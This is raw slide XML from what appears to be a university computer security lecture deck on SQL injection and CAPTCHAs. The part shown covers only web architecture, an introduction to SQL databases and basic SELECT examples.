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67DF1A0-50DC-4D23-8D0C-FF9689CADC95}">
  <a:tblStyle styleId="{067DF1A0-50DC-4D23-8D0C-FF9689CADC9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259CCB7-25B7-41DD-B261-6AF800CFBF2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xkcd.com/1897/" TargetMode="Externa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we.mitre.org/top25/archive/2020/2020_cwe_top25.html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959d2ced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1959d2ced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959d2ced3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1959d2ced3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959d2ced3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959d2ced3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959d2ced3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959d2ced3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959d2ced3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959d2ced3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1959d2ced3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1959d2ced3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959d2ced3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1959d2ced3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959d2ced3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1959d2ced3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959d2ced3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1959d2ced3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959d2ced3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1959d2ced3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1959d2ced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1959d2ced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1959d2ced3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1959d2ced3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959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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959d2ced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1959d2ced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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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959d2ced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1959d2ced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6cbd13de4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6cbd13de4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6cbd13de4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6cbd13de4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6cbd13de4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6cbd13de4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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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959d2ced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959d2ced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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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https://xkcd.com/1897/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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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6cbd13de49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6cbd13de49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6cbd13de49_0_7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6cbd13de4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959d2ced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959d2ced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6cbd13de49_0_8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6cbd13de4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6cbd13de49_0_9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16cbd13de49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6cbd13de49_0_10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6cbd13de49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6cbd13de49_0_10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6cbd13de49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6cbd13de49_0_11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6cbd13de49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16cbd13de49_0_12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16cbd13de49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6cbd13de49_0_12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16cbd13de49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959d2ced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1959d2ced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959d2ced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1959d2ced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https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html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1959d2ced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1959d2ced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11700" y="1429000"/>
            <a:ext cx="8520600" cy="14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1700" y="29179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Optional">
  <p:cSld name="TITLE_AND_BODY_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="A4C2F4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Optional">
  <p:cSld name="TITLE_AND_TWO_COLUMNS_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="A4C2F4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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198500" y="1246825"/>
            <a:ext cx="41310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2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4588175" y="1246825"/>
            <a:ext cx="41310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Optional">
  <p:cSld name="TITLE_ONLY_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="A4C2F4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- Optional">
  <p:cSld name="ONE_COLUMN_TEXT_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="A4C2F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4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half body - Optional">
  <p:cSld name="ONE_COLUMN_TEXT_1_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="A4C2F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5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198500" y="1246825"/>
            <a:ext cx="8520600" cy="16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- Optional">
  <p:cSld name="CUSTOM_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="A4C2F4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512100" y="4520775"/>
            <a:ext cx="811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198500" y="1246825"/>
            <a:ext cx="41310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588175" y="1246825"/>
            <a:ext cx="41310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7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half body">
  <p:cSld name="TITLE_AND_BODY_2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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198500" y="1246825"/>
            <a:ext cx="8520600" cy="16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512100" y="4520775"/>
            <a:ext cx="811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Optional">
  <p:cSld name="SECTION_HEADER_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="A4C2F4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98500" y="12468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0" y="1017725"/>
            <a:ext cx="9144000" cy="111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E85C5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</a:rPr>
              <a:t>Computer Science 161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7628700" y="1017725"/>
            <a:ext cx="1515300" cy="1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</a:rPr>
              <a:t>Fall 2022</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="600"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25.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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image" Target="../media/image2.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19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hyperlink" Target="https://cwe.mitre.org/data/definitions/352.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/416.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/190.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/78.html" TargetMode="External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cwe.mitre.org/data/definitions/79.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/787.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/200.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/476.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/22.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/434.html" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/287.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/20.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/94.html" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/125.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/732.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/119.html" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/89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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1429000"/>
            <a:ext cx="8520600" cy="14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and CAPTCHAs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Google Shape;74;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="29179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161 Fall 2022 - Lecture 15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Web Services</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Google Shape;13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7" name="Google Shape;137;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="542150" y="1655125"/>
            <a:ext cx="1562700" cy="3008100"/>
            <a:chOff x="542150" y="1655125"/>
            <a:chExt cx="1562700" cy="3008100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="138" name="Google Shape;138;p26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="542150" y="1655125"/>
              <a:ext cx="1562700" cy="3008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Client</a:t>
              </a:r>
              <a:endParaRPr b="1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Handle HTML, CSS, JavaScript, etc.</a:t>
              </a:r>
              <a:endParaRPr sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr descr="Chrome Logo, Chrome Symbol, Meaning, History and Evolution" id="139" name="Google Shape;139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7125" y="3421041"/>
              <a:ext cx="620200" cy="50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irefox - Wikipedia" id="140" name="Google Shape;140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26294" y="3421041"/>
              <a:ext cx="536331" cy="50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icrosoft Edge - Wikipedia" id="141" name="Google Shape;141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4644" y="4036616"/>
              <a:ext cx="505150" cy="50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rave Browser Review: Can it Topple Chrome and Safari? - Crypto Radar" id="142" name="Google Shape;142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441887" y="4036616"/>
              <a:ext cx="505149" cy="5051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3" name="Google Shape;143;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3790650" y="1655125"/>
            <a:ext cx="1562700" cy="3008100"/>
            <a:chOff x="3790650" y="1655125"/>
            <a:chExt cx="1562700" cy="3008100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="144" name="Google Shape;144;p26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3790650" y="1655125"/>
              <a:ext cx="1562700" cy="3008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Web Server</a:t>
              </a:r>
              <a:endParaRPr b="1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Process requests and handle server-side logic</a:t>
              </a:r>
              <a:endParaRPr sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="145" name="Google Shape;145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142226" y="3494954"/>
              <a:ext cx="859545" cy="3282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ile:Nginx logo.svg - Wikimedia Commons" id="146" name="Google Shape;146;p2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42229" y="3949478"/>
              <a:ext cx="859550" cy="181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IS - The Process Cannot Access the File Because it is Being Used by Another Process - Scott Brady" id="147" name="Google Shape;147;p2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142213" y="4257474"/>
              <a:ext cx="859549" cy="3687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8" name="Google Shape;148;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7039150" y="1655125"/>
            <a:ext cx="1562700" cy="3008100"/>
            <a:chOff x="7039150" y="1655125"/>
            <a:chExt cx="1562700" cy="3008100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="149" name="Google Shape;149;p26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7039150" y="1655125"/>
              <a:ext cx="1562700" cy="3008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Database Server</a:t>
              </a:r>
              <a:endParaRPr b="1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Store and provide access to persistent data</a:t>
              </a:r>
              <a:endParaRPr sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr descr="MySQL Logo - PNG e Vetor - Download de Logo" id="150" name="Google Shape;150;p2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137747" y="3549184"/>
              <a:ext cx="620199" cy="422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ostgreSQL - Wikipedia, la enciclopedia libre" id="151" name="Google Shape;151;p2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883050" y="3440175"/>
              <a:ext cx="620200" cy="640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icrosoft SQL server Logo PNG Transparent &amp; SVG Vector - Freebie Supply" id="152" name="Google Shape;152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7137747" y="4125241"/>
              <a:ext cx="620200" cy="501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2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7883048" y="4292263"/>
              <a:ext cx="620201" cy="167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4" name="Google Shape;154;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2191600" y="2301475"/>
            <a:ext cx="1502100" cy="338700"/>
            <a:chOff x="2191600" y="2301475"/>
            <a:chExt cx="1502100" cy="338700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="155" name="Google Shape;155;p26"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2191600" y="2640175"/>
              <a:ext cx="150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56" name="Google Shape;156;p26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2191600" y="2301475"/>
              <a:ext cx="1502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2. HTTP GET request</a:t>
              </a:r>
              <a:endParaRPr sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Google Shape;157;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3820950" y="2301475"/>
            <a:ext cx="150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3. Interpret request</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="158" name="Google Shape;158;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5445200" y="2301475"/>
            <a:ext cx="1502100" cy="338700"/>
            <a:chOff x="5445200" y="2301475"/>
            <a:chExt cx="1502100" cy="338700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="159" name="Google Shape;159;p26"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5445200" y="2640175"/>
              <a:ext cx="150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60" name="Google Shape;160;p26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5445200" y="2301475"/>
              <a:ext cx="1502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4. Query database</a:t>
              </a:r>
              <a:endParaRPr sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="161" name="Google Shape;161;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5445200" y="2880725"/>
            <a:ext cx="1502100" cy="338700"/>
            <a:chOff x="5445200" y="2880725"/>
            <a:chExt cx="1502100" cy="338700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="162" name="Google Shape;162;p26"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5445200" y="3219425"/>
              <a:ext cx="150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63" name="Google Shape;163;p26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5445200" y="2880725"/>
              <a:ext cx="1502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5. Return data</a:t>
              </a:r>
              <a:endParaRPr sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="Google Shape;164;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3820950" y="2880725"/>
            <a:ext cx="150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6. Construct response</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="165" name="Google Shape;165;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2196700" y="2880725"/>
            <a:ext cx="1502100" cy="338700"/>
            <a:chOff x="2196700" y="2880725"/>
            <a:chExt cx="1502100" cy="338700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="166" name="Google Shape;166;p26"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2196700" y="3219425"/>
              <a:ext cx="150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67" name="Google Shape;167;p26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="2196700" y="2880725"/>
              <a:ext cx="1502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7. HTTP response</a:t>
              </a:r>
              <a:endParaRPr sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="Google Shape;168;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="572450" y="2301475"/>
            <a:ext cx="150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1. User requests page</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="Google Shape;169;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="572450" y="2880725"/>
            <a:ext cx="1502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8. Browser renders page</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="170" name="Google Shape;170;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2233300" y="4206575"/>
            <a:ext cx="1428900" cy="338700"/>
            <a:chOff x="2233300" y="4206575"/>
            <a:chExt cx="1428900" cy="338700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="171" name="Google Shape;171;p26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2595100" y="4206575"/>
              <a:ext cx="705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/>
                <a:t>HTTP</a:t>
              </a:r>
              <a:endParaRPr b="1" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="172" name="Google Shape;172;p26"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="171" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2233300" y="4375925"/>
              <a:ext cx="361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  <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="173" name="Google Shape;173;p26"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="171" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3300400" y="4375925"/>
              <a:ext cx="361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74" name="Google Shape;174;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5481800" y="4129625"/>
            <a:ext cx="1428900" cy="492600"/>
            <a:chOff x="5481800" y="4129625"/>
            <a:chExt cx="1428900" cy="492600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="175" name="Google Shape;175;p26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5843600" y="4129625"/>
              <a:ext cx="705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/>
                <a:t>SQL (usually)</a:t>
              </a:r>
              <a:endParaRPr b="1" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="176" name="Google Shape;176;p26"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="175" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5481800" y="4375925"/>
              <a:ext cx="361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  <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="177" name="Google Shape;177;p26"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="175" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6548900" y="4375925"/>
              <a:ext cx="361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Databases</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="Google Shape;183;p27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this class, we will cover SQL databases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SQL = Structured Query Language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database has a number of tables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table has a predefined structure, so it has columns for each field and rows for each entry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Database server manages access and storage of these databases</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Google Shape;18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85" name="Google Shape;185;p27"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="214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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="383925"/>
                <a:gridCol w="944775"/>
                <a:gridCol w="1615075"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="1289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b="1" i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  <a:tr h="12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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="Google Shape;191;p28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Structured Query Language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>): The language used to interact with and manage data stored in a database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Defined by the International Organization for Standardization (ISO) and implemented by many SQL servers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Good SQL servers are ACID (atomicity, consistency, isolation, and durability)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Essentially ensures that the database will never store a partial operation, return an invalid state, or be vulnerable to race conditions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Declarative programming language, rather than imperative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Declarative: Use code to define the result you want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Imperative: Use code to define exactly what to do (e.g. C, Python, Go)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Google Shape;19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SELECT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="Google Shape;198;p29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SELECT is used to select some columns from a table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Syntax:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:b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SELECT [columns] FROM [table]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9" name="Google Shape;19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00" name="Google Shape;200;p29"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="214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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="383925"/>
                <a:gridCol w="944775"/>
                <a:gridCol w="1615075"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="1289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b="1" i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  <a:tr h="12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SELECT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206" name="Google Shape;206;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223575" y="2511725"/>
            <a:ext cx="4411500" cy="5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SELECT name, age FROM bots</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p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08" name="Google Shape;208;p30"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="214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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="383925"/>
                <a:gridCol w="944775"/>
                <a:gridCol w="1615075"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="1289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b="1" i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  <a:tr h="12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209" name="Google Shape;209;p30"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="312500" y="305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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="944775"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="12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2 columns</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc hMerge="1"/>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="Google Shape;210;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312500" y="1244825"/>
            <a:ext cx="3504900" cy="6156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Selected 2 columns from the table, keeping all rows.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SELECT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Google Shape;21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17" name="Google Shape;217;p31"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="214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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="383925"/>
                <a:gridCol w="944775"/>
                <a:gridCol w="1615075"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="1289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b="1" i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  <a:tr h="12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218" name="Google Shape;218;p31"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="278300" y="2949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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="383925"/>
                <a:gridCol w="944775"/>
                <a:gridCol w="1615075"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="12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219" name="Google Shape;219;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223575" y="2511725"/>
            <a:ext cx="4411500" cy="5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SELECT * FROM bots</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="Google Shape;220;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312500" y="1244825"/>
            <a:ext cx="3504900" cy="8313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asterisk (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/>
              <a:t>) is shorthand for “all columns.” Select all columns from the table, keeping all rows.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SELECT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="Google Shape;2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27" name="Google Shape;227;p32"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="214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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="383925"/>
                <a:gridCol w="944775"/>
                <a:gridCol w="1615075"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="1289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b="1" i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  <a:tr h="12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228" name="Google Shape;228;p32"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
